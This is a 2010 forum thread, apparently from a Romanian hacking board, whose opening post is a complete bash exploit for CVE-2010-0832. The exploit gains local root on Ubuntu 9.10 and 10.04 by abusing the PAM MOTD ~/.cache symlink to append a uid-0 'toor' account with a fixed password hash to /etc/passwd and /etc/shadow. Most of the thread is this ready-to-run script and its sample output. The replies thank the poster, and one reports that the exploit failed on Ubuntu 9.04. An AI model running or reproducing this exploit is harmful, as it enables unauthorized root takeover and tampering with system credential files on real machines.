begood Posted July 12, 2010 Report Share Posted July 12, 2010 #!/bin/bash## Exploit Title: Ubuntu PAM MOTD local root# Date: July 9, 2010# Author: Anonymous# Software Link: http://packages.ubuntu.com/# Version: pam-1.1.0# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)# CVE: CVE-2010-0832# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen## Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.# Does not prompt for login by creating temporary SSH key and authorized_keys entry.## user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh# [*] Ubuntu PAM MOTD local root# [*] Backuped /home/user/.ssh/authorized_keys# [*] SSH key set up# [*] Backuped /home/user/.cache# [*] spawn ssh# [+] owned: /etc/passwd# [*] spawn ssh# [+] owned: /etc/shadow# [*] Restored /home/user/.cache# [*] Restored /home/user/.ssh/authorized_keys# [*] SSH key removed# [+] Success! Use password toor to get root# Password:# root@ubuntu:/home/user# id# uid=0(root) gid=0(root) groupes=0(root)#P='toor:x:0:0:root:/root:/bin/bash'S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'echo "[*] Ubuntu PAM MOTD local root"[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1backup() { [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak [ -e "$1" ] || return 0 mv "$1"{,.bak} || return 1 echo "[*] Backuped $1"}restore() { [ -e "$1" ] && rm -rf "$1" [ -e "$1".bak ] || return 0 mv "$1"{.bak,} || return 1 echo "[*] Restored $1"}key_create() { backup ~/.ssh/authorized_keys ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1 [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; } mv "$KEY.pub" ~/.ssh/authorized_keys || return 1 echo "[*] SSH key set up"}key_remove() { rm -f "$KEY" restore ~/.ssh/authorized_keys echo "[*] SSH key removed"}own() { [ -e ~/.cache ] && rm -rf ~/.cache ln -s "$1" ~/.cache || return 1 echo "[*] spawn ssh" ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; } echo "[+] owned: $1"}bye() { key_remove exit 1}KEY="$(mktemp -u)"key_create || { echo "[-] Failed to setup SSH key"; exit 1; }backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }own /etc/passwd && echo "$P" >> /etc/passwdown /etc/shadow && echo "$S" >> /etc/shadowrestore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }key_removeecho "[+] Success! Use password toor to get root"su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \ chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toorUbuntu PAM MOTD Local Root Exploit Quote Link to comment Share on other sites More sharing options...
ANdreicj Posted July 12, 2010 Report Share Posted July 12, 2010 (edited) Pe orice versiune merge, sau pe cateva ? LE :Mersi. Edited July 12, 2010 by ANdreicj Quote Link to comment Share on other sites More sharing options...
begood Posted July 12, 2010 Author Report Share Posted July 12, 2010 # Version: pam-1.1.0# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx) Quote Link to comment Share on other sites More sharing options...
Flubber Posted July 13, 2010 Report Share Posted July 13, 2010 Super, multumesc frumos. Quote Link to comment Share on other sites More sharing options...
Cheater Posted July 14, 2010 Report Share Posted July 14, 2010 Bun, bun, de retinut! TY! Quote Link to comment Share on other sites More sharing options...
Flubber Posted July 22, 2010 Report Share Posted July 22, 2010 Am testat pe: Ubuntu 9.04 / Linux 2.6.28-11-serverNu a functionat.aa@x:/tmp$ ./ub.sh[*] Ubuntu PAM MOTD local root[*] SSH key set up[*] spawn sshaa@localhost's password: [-] Own /etc/passwd failed[*] SSH key removed Quote Link to comment Share on other sites More sharing options...